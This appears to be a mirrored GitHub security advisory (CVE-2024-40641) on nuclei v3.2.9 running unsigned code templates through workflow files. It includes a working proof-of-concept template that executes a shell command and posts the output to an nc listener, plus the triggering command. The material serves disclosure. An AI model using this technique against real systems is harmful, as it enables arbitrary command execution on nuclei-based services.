Ecosyste.ms: Advisories

Security Advisories: GSA_kwCzR0hTQS1jM3E5LWMyN3AtY3c5aM4AA9_J

projectdiscovery/nuclei allows unsigned code template execution through workflows

Summary

Find a way to execute code template without -code option and signature.

Details

write a code.yaml:

id: code

info:
  name: example code template
  author: ovi3


code:
  - engine:
      - sh
      - bash
    source: |
      id

http:
  - raw:
      - |
        POST /re HTTP/1.1
        Host: {{Hostname}}

        {{code_response}}

workflows:
  - matchers:
    - name: t

using nc to listen on 80:

nc -lvvnp 80

execute PoC template with nuclei:

./nuclei -disable-update-check  -w code.yaml -u http://127.0.0.1 -vv -debug

and nc will get id command output.

We use -w to specify a workflow file, not -t to template file. and notice there is a workflows field in code.yaml to pretend to be a workflow file.

Test in Linux and Nuclei v3.2.9

Impact

Some web applications inherit from Nuclei and allow users to edit and execute workflow files. In this case, users can execute arbitrary commands. (Although, as far as I know, most web applications use -t to execute)

Permalink: https://github.com/advisories/GHSA-c3q9-c27p-cw9h
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jM3E5LWMyN3AtY3c5aM4AA9_J
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: about 2 months ago
Updated: about 1 month ago

CVSS Score: 7.4
CVSS vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N

Identifiers: GHSA-c3q9-c27p-cw9h, CVE-2024-40641
References:

• https://github.com/projectdiscovery/nuclei/security/advisories/GHSA-c3q9-c27p-cw9h
• https://nvd.nist.gov/vuln/detail/CVE-2024-40641
• https://github.com/advisories/GHSA-c3q9-c27p-cw9h

Repository: https://github.com/projectdiscovery/nuclei
Blast Radius: 0.0

Affected Packages